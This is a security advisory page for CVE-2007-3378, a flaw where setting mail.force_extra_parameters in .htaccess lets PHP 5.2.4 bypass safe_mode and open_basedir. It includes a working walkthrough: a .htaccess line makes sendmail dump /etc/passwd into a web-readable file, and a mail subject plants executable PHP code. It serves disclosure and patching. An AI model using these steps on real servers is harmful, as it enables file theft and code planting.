PHP 5.2.4 mail.force_extra_parameters unsecure

2007.11.25
Credit: Maksymilian Arciemowicz
Risk: Medium
Local: Yes
Remote: No
CVE: CVE-2007-3378
CWE: CWE-264


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[PHP 5.2.4 mail.force_extra_parameters unsecure ] Author: Maksymilian Arciemowicz Date: - - Written: 06.09.2007 - - Public: 01.11.2007 CVE: CVE-2007-3378 Risk: Medium Affected Software: PHP <= 5.2.4 Advisory URL: Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf) and .htaccess files. You will need "AllowOverride Options" or "AllowOverride All" privileges to do so. php_value name value Sets the value of the specified directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value use none as the value. Note: Don't use php_value to set boolean values. php_flag (see below) should be used instead. php_flag name on|off Used to set a boolean configuration directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. mail.force_extra_parameters - Force the addition of the specified parameters to be passed as extra parameters to the sendmail binary. These parameters will always replace the value of the 5th parameter to mail(), even in safe mode http://pl.php.net/manual/en/configuration.changes.php - --- 1. htaccess safemode and open_basedir Bypass Vulnerability per mail.force_extra_parameters --- We will show How to exploit this issue. When using PHP as an Apache module, you can also change the configuration settings using directives in .htaccess file. But it is possible to bypass a safe_mode or open_basedir per mail.force_extra_parameters. In a lot of servers is sendmail, can be also exim etc. But we show how to exploit this for a famous mail server (SENDMAIL). For example you can set mail.force_extra_parameters via .htaccess. cxib# curl -I http://localhost:82 HTTP/1.1 200 OK Date: Thu, 06 Sep 2007 22:18:35 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.4 Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT ETag: "27e4f0-2c-4c23b600" Accept-Ranges: bytes Content-Length: 44 Content-Type: text/html Apache 2.2.4 and PHP 5.2.4. Let's see folder "/narkotyk" in localhost:82. cxib# ls -la total 10 drwxrwxrwx 2 www www 512 Sep 7 00:26 . drwxr-xr-x 4 www wheel 512 Sep 7 00:22 .. - -rw-r--r-- 1 www www 106 Sep 7 00:25 .htaccess - -rw-r--r-- 1 www www 29 Sep 7 00:25 file1.php - -rw-r--r-- 1 www www 56 Sep 7 00:26 file2.php cxib# cat file1.php <? include("/etc/passwd"); ?> cxib# curl http://localhost:82/narkotyk/file1.php <br /> <b>Warning</b>: include() [<a href='function.include'>function.include</a>]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/passwd owned by uid 0 in <b>/usr/local/www/apache22/data/narkotyk/file1.php</b> on line <b>1</b><br /> <br /> <b>Warning</b>: include(/etc/passwd) [<a href='function.include'>function.include</a>]: failed to open stream: Invalid argument in <b>/usr/local/www/apache22/data/narkotyk/file1.php</b> on line <b>1</b><br /> <br /> <b>Warning</b>: include() [<a href='function.include'>function.include</a>]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in <b>/usr/local/www/apache22/data/narkotyk/file1.php</b> on line <b>1</b><br /> so safe_mode is open. Let's see files .htaccess and file2.php cxib# cat file2.php <? var_dump(mail("root@localhost", "hallo", "root")); ?> cxib# cat .htaccess php_value mail.force_extra_parameters '-C /etc/passwd -X /usr/local/www/apache22/data/narkotyk/result.txt' and let's send request to file2.php cxib# curl http://localhost:82/narkotyk/file2.php bool(false) False!? No cxib# ls -la /usr/local/www/apache22/data/narkotyk/result.txt - -rw-r--r-- 1 www www 7130 Sep 7 00:31 /usr/local/www/apache22/data/narkotyk/result.txt cxib# result.txt has been created. cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt 69647 >>> /etc/passwd: line 3: unknown configuration line "root:*:0:0:Charlie &:/root:/bin/csh" 69647 >>> /etc/passwd: line 4: unknown configuration line "toor:*:0:0:Bourne-again Superuser:/root:" ..... etc. We can read file and safe_mode and open_basedir is bypassed. It is possible create file with php code. But we need have sendmail.cf to send email. Example: cxib# cat .htaccess php_value mail.force_extra_parameters '-C /usr/local/www/apache22/data/narkotyk/sendmail.cf -X /usr/local/www/apache22/data/narkotyk/phpcode.php' cxib# cat file3.php <? var_dump(mail("root@xxxxxxxxxxxxxxxxxx", "h<? phpinfo(); ?>allo", "root")); ?> We need create /usr/local/www/apache22/data/narkotyk/sendmail.cf and configure this file. Then cxib# curl http://localhost:82/narkotyk/file3.php bool(true) cxib# cxib# cat phpcode.php 69755 <<< To: root@xxxxxxxxxxxxxxxxxx 69755 <<< Subject: h<? phpinfo(); ?>allo 69755 <<< 69755 <<< root 69755 <<< [EOF] 69757 === CONNECT cxsecurity.pl ... etc and now cxib# curl http://localhost:82/narkotyk/phpcode.php 69755 <<< To: root@xxxxxxxxxxxxxxxxxx 69755 <<< Subject: h<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html><head> <style type="text/css"> body {background-color: #ffffff; color: #000000;} body, td, th, h1, h2 {font-family: sans-serif;} ... phpinfo(). This was example for php 5.2.4 with sendmail. But we think, it is possible exploit exim and more send mail programs. In PHP 5.2.4 mail.force_extra_parameters is filtered per php_escape_shell_cmd(). But we needn't bypass this function. - --- mail.c --- if (force_extra_parameters) { extra_cmd = php_escape_shell_cmd(force_extra_parameters); } else if (extra_cmd) { extra_cmd = php_escape_shell_cmd(extra_cmd); } - --- mail.c --- Interesting is: - --- mail.c --- if (PG(safe_mode) && (ZEND_NUM_ARGS() == 5)) { php_error_docref(NULL TSRMLS_CC, E_WARNING, "SAFE MODE Restriction in effect. The fifth parameter is disabled in SAFE MODE."); RETURN_FALSE; } - --- mail.c --- 5 th parameter in mail() function is checked. mail.force_extra_parameters no. Before public advisory we tested issue and we send advisory to PHP Team. Main problem is that, we do not recived any answer. We do not checked patch to CVE-2007-3378, but we are using CVE-2007-3378 to identification . php_escape_shell_cmd() is not reason for CVE-2007-3378. - --- 2. Exploit --- N/A Anybody can self exploit this. - --- 3. How to fix --- - --- note from SREASONRES:20070627 --- This bug has been founded on February 2007 We contacted with PHP Team again. With co-operation Stanislav Malyshev from PHP Team the PHP 5.2.5 is now fully patched against "mail.force_extra_parameters" issue . - --- note from SREASONRES:20070627 --- Update to PHP5.2.5 - --- 4. Greets --- For: l5x and Stefan Esser - --- 5. Contact --- Author: Maksymilian Arciemowicz

References:

http://docs.info.apple.com/article.html?artnum=307562
http://lists.apple.com/archives/security-announce/2008/Mar/msg00001.html
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01345501
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01345501
http://www.gentoo.org/security/en/glsa/glsa-200710-02.xml
http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.335136


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top